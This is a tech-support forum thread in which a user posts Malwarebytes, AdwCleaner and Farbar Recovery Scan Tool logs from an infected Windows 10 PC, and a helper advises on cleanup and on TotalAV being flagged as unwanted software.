Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm39E0.tmp\update.exe, Quarantined, [494], [511084],1.0.9182
Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm4579.tmp\update.exe, Quarantined, [494], [511084],1.0.9182
Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm49E9.tmp\update.exe, Quarantined, [494], [511084],1.0.9182
Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm4D74.tmp\update.exe, Quarantined, [494], [511084],1.0.9182
Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm54A7.tmp\update.exe, Quarantined, [494], [511084],1.0.9182
Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\MO24N4005VT\I2Z4DMKLDUC.EXE, Quarantined, [3707], [521959],1.0.9182
Adware.Tuto4PC.Generic, C:\USERS\THOMAZING!\APPDATA\ROAMING\M1DFK02FRCW\KPAWYBAEOIA.EXE, Quarantined, [3707], [521959],1.0.9182
Adware.Tuto4PC.Generic, C:\PROGRAM FILES\OTIZAMD5IS\CAST.CONFIG, Quarantined, [3707], [404709],1.0.9182
Adware.Tuto4PC.Generic, C:\Program Files\OTIZAMD5IS\8LD0IPFQC.exe.config, Quarantined, [3707], [404709],1.0.9182
Adware.Tuto4PC.Generic, C:\Program Files\OTIZAMD5IS\uninstaller.exe.config, Quarantined, [3707], [404709],1.0.9182
Generic.Malware/Suspicious, C:\USERS\THOMAZING!\APPDATA\LOCAL\NAMFRESH.BIN, Quarantined, [0], [392686],1.0.9182
Adware.Tuto4PC.Generic, C:\PROGRAM FILES (X86)\0QFOY55ME3I\CAST.CONFIG, Quarantined, [3707], [404875],1.0.9182
Adware.Tuto4PC.Generic, C:\Program Files (x86)\0qfoy55me3i\config.conf, Quarantined, [3707], [404875],1.0.9182
Adware.Tuto4PC.Generic, C:\Program Files (x86)\0qfoy55me3i\ESDJ37B9ITN0QK9.exe.config, Quarantined, [3707], [404875],1.0.9182
Adware.Tuto4PC.Generic, C:\Program Files (x86)\0qfoy55me3i\GMJSB.exe.config, Quarantined, [3707], [404875],1.0.9182
Adware.Linkury.TskLnk, C:\USERS\THOMAZING!\APPDATA\LOCAL\INSTALLATIONCONFIGURATION.XML, Quarantined, [14461], [444923],1.0.9182
Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\CONFIG.XML, Quarantined, [3745], [404859],1.0.9182
Generic.Malware/Suspicious, C:\USERS\THOMAZING!\APPDATA\LOCAL\JOYBAM.EXE, Quarantined, [0], [392686],1.0.9182
Adware.Tuto4PC.Generic, C:\PROGRAM FILES\XUL9ZBX11Q\CAST.CONFIG, Quarantined, [3707], [404610],1.0.9182
Adware.Tuto4PC.Generic, C:\Program Files\XUL9ZBX11Q\uninstaller.exe.config, Quarantined, [3707], [404610],1.0.9182
Adware.Tuto4PC.Generic, C:\Program Files\XUL9ZBX11Q\XUL9ZBX11.exe.config, Quarantined, [3707], [404610],1.0.9182
Adware.Linkury.TskLnk, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\INSTALLATIONCONFIGURATION.XML, Quarantined, [14461], [444922],1.0.9182
Generic.Malware/Suspicious, C:\USERS\THOMAZING!\APPDATA\LOCAL\SILSONING.EXE, Quarantined, [0], [392686],1.0.9182
Trojan.BitCoinMiner.BatBitRst, C:\WINDOWS\SYSTEM32\TASKS\iewiouoxxf, Quarantined, [6000], [571190],1.0.9182
Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Removal Failed, [6000], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Removal Failed, [6000], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Removal Failed, [6000], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\APPLICATION DATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Removal Failed, [6000], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Removal Failed, [6000], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR0.DAT, Removal Failed, [6000], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\DOCUMENTS AND SETTINGS\ALL USERS\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Removal Failed, [6000], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\PROGRAMDATA\MICROSOFT\NETWORK\DOWNLOADER\QMGR1.DAT, Removal Failed, [6000], [-1],0.0.0
Trojan.BitCoinMiner.BatBitRst, C:\WINDOWS\SYSTEM32\TASKS\{793C8F45-2D37-6E42-38A1-4FC6F516C21B}, Quarantined, [6000], [598042],1.0.9182
Trojan.BitCoinMiner.BatBitRst, C:\WINDOWS\SYSTEM32\TASKS\hjuzju, Quarantined, [6000], [622124],1.0.9182
Adware.Linkury, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\46C812328954B3C2.VIR\SET.EXE, Quarantined, [1174], [504848],1.0.9182
Adware.ICLoader, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\423E52EEC1C7E6E2.VIR\LOCALNETSERVICE.EXE, Quarantined, [446], [629607],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\D6F63DA8166D7663.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\0B197384E1480C88.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\17B0D9AEADE97C1A.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\4D8D65C5DA32D3A5.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\5E15C71E020C778B.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\7349C58712B00B86.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\A7EC7F560E599347.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\BC9E0698B166F917.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\D41277DE13A9FABA.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\9869B8B38090EC66.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\D6D561D61D8312CF.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\002807D4DB6FEE2D.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\2DCB9015FB18C84D.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\638453067B9E1F8E.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\700D3EFE72E93B94.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\02FD59526C78F783.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\AEF671FBA34734D1.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\B3795D7D66BEAA7D.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\27C38BCBF4B005D9.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\BCF319F66631ED11.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\8334C130D38839A4.VIR, Quarantined, [2891], [625750],1.0.9182
Generic.Malware/Suspicious, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\34A244487189F73A.VIR, Quarantined, [0], [392686],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\BD9C0D84EEB01CAF.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Csdimonetize, C:\PROGRAMDATA\ROGUEKILLER\QUARANTINE\E89B8E7F8458E128.VIR, Quarantined, [2891], [625750],1.0.9182
Adware.Agent, C:\WINDOWS\SYSTEM32\DRIVERS\WINMON.SYS, Quarantined, [99], [431629],1.0.9182
Adware.Linkury, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\HBDZI2BL.PRE\APSF360DEV.EXE, Quarantined, [1174], [475745],1.0.9182
Adware.Csdimonetize, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\IS-A6C3B.TMP\HOUSSEMID.EXE, Quarantined, [2891], [636075],1.0.9182
Backdoor.Andromeda, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\INSTALLER_MI.EXE, Quarantined, [837], [116111],1.0.9182
Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\NCYVGT4VXOC.EXE, Quarantined, [2805], [474076],1.0.9182
Trojan.MalPack, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\XTEX.EXE, Quarantined, [528], [636874],1.0.9182
Trojan.MalPack, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\PUVOQBDY.0AB\APP.EXE, Quarantined, [528], [636874],1.0.9182
PUP.Optional.BazzSearch, C:\USERS\THOMAZING!\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [225], [550044],1.0.9182
PUP.Optional.BazzSearch, C:\USERS\THOMAZING!\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Preferences, Replaced, [225], [550044],1.0.9182
PUP.Optional.BazzSearch, C:\USERS\THOMAZING!\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [225], [550044],1.0.9182
Adware.ICLoader, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\MCASIN.EXE, Quarantined, [446], [629607],1.0.9182
Generic.Malware/Suspicious, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\KSKYZLLQ.5IO\SETUP.EXE, Quarantined, [0], [392686],1.0.9182
Physical Sector: 0
(No malicious items detected)
WMI: 0
(No malicious items detected)
(end)
-
February 9th, 2019, 12:55 AM
#6
AdwCleaner[C00]
# -------------------------------
# Malwarebytes AdwCleaner 7.2.7.0
# -------------------------------
# Build: 01-30-2019
# Database: 2019-02-07.2 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 02-09-2019
# Duration: 00:00:01
# OS: Windows 10 Pro
# Cleaned: 17
# Failed: 0
***** [ Services ] *****
No malicious services cleaned.
***** [ Folders ] *****
Deleted C:\Users\Thomazing!\AppData\Roaming\TotalAV
Deleted C:\Users\Thomazing!\Documents\TotalAV
Deleted C:\Windows\Syswow64\SSL
Deleted C:\Users\Thomazing!\AppData\Local\WhiteClick
Deleted C:\Windows\rss
***** [ Files ] *****
Deleted C:\Windows\System32\drivers\WinmonFS.sys
***** [ DLL ] *****
No malicious DLLs cleaned.
***** [ WMI ] *****
No malicious WMI cleaned.
***** [ Shortcuts ] *****
No malicious shortcuts cleaned.
***** [ Tasks ] *****
No malicious tasks cleaned.
***** [ Registry ] *****
Deleted HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\myway.com
Deleted HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\filmfanatic2.dl.tb.ask.com
Deleted HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\filmfanatic2.dl.myway.com
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|cloudnet
Deleted HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\staticimgfarm.com
Deleted HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ak.staticimgfarm.com
Deleted HKCU\Software\Microsoft\Internet Explorer\DOMStorage\staticimgfarm.com
Deleted HKCU\Software\Microsoft\Internet Explorer\DOMStorage\ak.staticimgfarm.com
Deleted HKLM\System\CurrentControlSet\Services\EventLog\Application\SecurityService
Deleted HKLM\SOFTWARE\Mozilla\NativeMessagingHosts\com.totalav.passwordvaultassistant
Deleted HKLM\SOFTWARE\Google\Chrome\NativeMessagingHosts\com.totalav.passwordvaultassistant
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries cleaned.
***** [ Chromium URLs ] *****
No malicious Chromium URLs cleaned.
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries cleaned.
***** [ Firefox URLs ] *****
No malicious Firefox URLs cleaned.
*************************
[+] Delete Tracing Keys
[+] Reset Winsock
*************************
AdwCleaner[S00].txt - [2783 octets] - [09/02/2019 12:30:40]
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########
AdwCleaner[S00]
# -------------------------------
# Malwarebytes AdwCleaner 7.2.7.0
# -------------------------------
# Build: 01-30-2019
# Database: 2019-02-07.2 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start: 02-09-2019
# Duration: 00:00:14
# OS: Windows 10 Pro
# Scanned: 31844
# Detected: 17
***** [ Services ] *****
No malicious services found.
***** [ Folders ] *****
PUP.Optional.Legacy C:\Users\Thomazing!\AppData\Roaming\TotalAV
PUP.Optional.Legacy C:\Users\Thomazing!\Documents\TotalAV
PUP.Optional.Legacy C:\Windows\Syswow64\SSL
PUP.Optional.WhiteClick C:\Users\Thomazing!\AppData\Local\WhiteClick
Trojan.Agent C:\Windows\rss
***** [ Files ] *****
Trojan.Agent C:\Windows\System32\drivers\WinmonFS.sys
***** [ DLL ] *****
No malicious DLLs found.
***** [ WMI ] *****
No malicious WMI found.
***** [ Shortcuts ] *****
No malicious shortcuts found.
***** [ Tasks ] *****
No malicious tasks found.
***** [ Registry ] *****
PUP.MyWebSearch.Heuristic HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\myway.com
PUP.MyWebSearch.Heuristic HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\filmfanatic2.dl.tb.ask.com
PUP.MyWebSearch.Heuristic HKCU\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\filmfanatic2.dl.myway.com
PUP.Optional.Glupteba HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|cloudnet
PUP.Optional.Legacy HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\staticimgfarm.com
PUP.Optional.Legacy HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ak.staticimgfarm.com
PUP.Optional.Legacy HKCU\Software\Microsoft\Internet Explorer\DOMStorage\staticimgfarm.com
PUP.Optional.Legacy HKCU\Software\Microsoft\Internet Explorer\DOMStorage\ak.staticimgfarm.com
PUP.Optional.PCProtect HKLM\System\CurrentControlSet\Services\EventLog\Application\SecurityService
PUP.Optional.TotalAV HKLM\SOFTWARE\Mozilla\NativeMessagingHosts\com.totalav.passwordvaultassistant
PUP.Optional.TotalAV HKLM\SOFTWARE\Google\Chrome\NativeMessagingHosts\com.totalav.passwordvaultassistant
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries found.
***** [ Chromium URLs ] *****
No malicious Chromium URLs found.
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries found.
***** [ Firefox URLs ] *****
No malicious Firefox URLs found.
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S00].txt ##########
-
February 9th, 2019, 01:00 AM
#7
After doing AdwCleaner, there this trojan was blocked by malwarebytes. But it only pops once in a while. Trojan after AdwCleaner.png
-
February 9th, 2019, 08:28 AM
#8
And why the scanners treat Total AV a PUP????
Is that normal???
heard that Total AV is the top 1 free antivirus for 2019...
-
February 9th, 2019, 09:49 PM
#9
I'd avoid that program. Please read here: https://malwaretips.com/threads/tota...-a-scam.80362/
Re-run Farbar Recovery Scan Tool (FRST/FRST64) you ran at the very beginning of this topic.
- Double click to run it.
- Make sure you checkmark Addition.txt box.
- Press Scan button.
- Scan will create two logs, FRST.txt and Addition.txt in the same directory the tool is run. Please copy and paste them to your reply.
-
February 10th, 2019, 03:28 AM
#10
Oh I see. What do you recommend aside from Avast? Somewhat has a very fast, simple and friendly interface? Is kaspersky good with that criteria?
Here:
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 8.02.2019
Ran by Thomazing! (administrator) on DESKTOP-OHFLJFD (10-02-2019 15:24:18)
Running from C:\Users\Thomazing!\Downloads
Loaded Profiles: Thomazing! & (Available Profiles: Thomazing!)
Platform: Windows 10 Pro 10240.16487 (X64) Language: English (United States)
Default browser: IE
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic...ery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Microsoft Corporation) C:\Windows\System32\NetworkUXBroker.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16464_none_116100d161f6ab1d\TiWorker.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3948600 2016-06-10] (Tonec Inc.)
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [19645800 2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3948600 2016-06-10] (Tonec Inc.)
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [19645800 2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3948600 2016-06-10] (Tonec Inc.)
HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [19645800 2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.96\Installer\chrmstp.exe [2019-02-08] (Google LLC -> Google Inc.)
HKLM\Software\...\Authentication\Credential Providers: [{8AF662BF-65A0-4D0A-A540-A338A999D36F}] -> C:\Windows\system32\FaceCredentialProvider.dll [2015-09-10] (Microsoft Windows -> )
HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] -> C:\Windows\system32\FaceCredentialProvider.dll [2015-09-10] (Microsoft Windows -> )
GroupPolicy: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{162dea71-3191-454f-8a8b-be0d312e54a5}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{95ee421a-76b4-4efd-b402-599e79537eca}: [DhcpNameServer] 10.22.96.55 10.1.96.55
Internet Explorer:
==================
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2015-12-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2019-02-08] (Google Inc -> Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2015-12-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2019-02-08] (Google Inc -> Google Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation -> Microsoft Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2019-02-08] (Google Inc -> Google Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2019-02-08] (Google Inc -> Google Inc.)
FireFox:
========
FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5 [2019-02-09] [Legacy] [not signed]
FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2016-06-08] [Legacy]
FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5
FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152109985\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Thomazing!\AppData\Roaming\IDM\idmmzcc5
FF HKU\S-1-5-21-3408261874-2140888000-2142219774-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-02102019152308407\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2019-02-08] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2019-02-08] (Google Inc.)
Chrome:
=======
CHR Profile: C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default [2019-02-10]
CHR Extension: (Slides) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-02-08]
CHR Extension: (Docs) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-02-08]
CHR Extension: (Google Drive) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-02-08]
CHR Extension: (chrome_filter) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\begnkeifkeikfcimaaddacpiojbnagko [2019-02-08]
CHR Extension: (YouTube) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-02-08]
CHR Extension: (No Name) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\dpapfcgjbomdehpglobkahgbbfamomgo [2019-02-09]
CHR Extension: (Sheets) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-02-08]
CHR Extension: (Google Docs Offline) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-02-08]
CHR Extension: (IDM Integration Module) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-09]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Thomazing!\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-02-08]
